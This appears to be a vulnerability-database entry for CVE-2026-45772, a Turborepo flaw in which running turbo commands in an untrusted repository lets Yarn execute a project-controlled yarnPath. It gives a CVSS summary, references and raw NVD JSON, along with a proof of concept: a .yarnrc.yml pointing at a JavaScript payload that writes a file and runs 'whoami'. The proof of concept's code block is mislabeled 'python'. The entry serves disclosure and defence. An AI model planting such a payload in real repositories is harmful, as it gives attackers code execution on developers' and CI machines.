CVE-2026-45772

Description

Turborepo is a high-performance build system for JavaScript and TypeScript codebases. From 1.1.0 to before 2.9.14, Turborepo can be vulnerable to arbitrary code execution when run in untrusted repositories that contain malicious Yarn configuration. In affected versions, package manager detection executed yarn --version from the project directory, which could cause Yarn to load and execute a project-controlled yarnPath from .yarnrc.yml. An attacker who controls repository contents could cause code execution when a user or CI system runs affected turbo, @turbo/codemod, or @turbo/workspace conversion commands. This vulnerability is fixed in 2.9.14.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vercel:turborepo:*:*:*:*:*:node.js:*:* - VULNERABLE

Turborepo >= 1.1.0, < 2.9.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# .yarnrc.yml configuration file
# This file tricks Yarn into loading a malicious binary
yarnPath: ./malicious-payload.js


// File: malicious-payload.js
// This script is executed by Yarn when yarn --version is run

const { exec } = require('child_process');
const fs = require('fs');

// Example: Creating a simple proof of concept file
fs.writeFileSync('/tmp/poc.txt', 'CVE-2026-45772 Exploit Success!');

// Example: Executing a system command (e.g., calc.exe or whoami)
exec('whoami', (error, stdout, stderr) => {
    if (error) {
        console.error(`exec error: ${error}`);
        return;
    }
    console.log(`Current User: ${stdout}`);
});

console.log('Malicious code executed via yarnPath!');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45772
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45772
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45772/
[4] VulDB https://vuldb.com/cve/CVE-2026-45772
[5] https://github.com/vercel/turborepo/security/advisories/GHSA-3qcw-2rhx-2726

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45772", "sourceIdentifier": "[email protected]", "published": "2026-05-15T16:16:14.987", "lastModified": "2026-05-19T14:41:16.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turborepo is a high-performance build system for JavaScript and TypeScript codebases. From 1.1.0 to before 2.9.14, Turborepo can be vulnerable to arbitrary code execution when run in untrusted repositories that contain malicious Yarn configuration. In affected versions, package manager detection executed yarn --version from the project directory, which could cause Yarn to load and execute a project-controlled yarnPath from .yarnrc.yml. An attacker who controls repository contents could cause code execution when a user or CI system runs affected turbo, @turbo/codemod, or @turbo/workspace conversion commands. This vulnerability is fixed in 2.9.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:turborepo:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "2.9.14", "matchCriteriaId": "DF294351-4488-43A9-B86D-5A5A1F922A2B"}]}]}], "references": [{"url": "https://github.com/vercel/turborepo/security/advisories/GHSA-3qcw-2rhx-2726", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}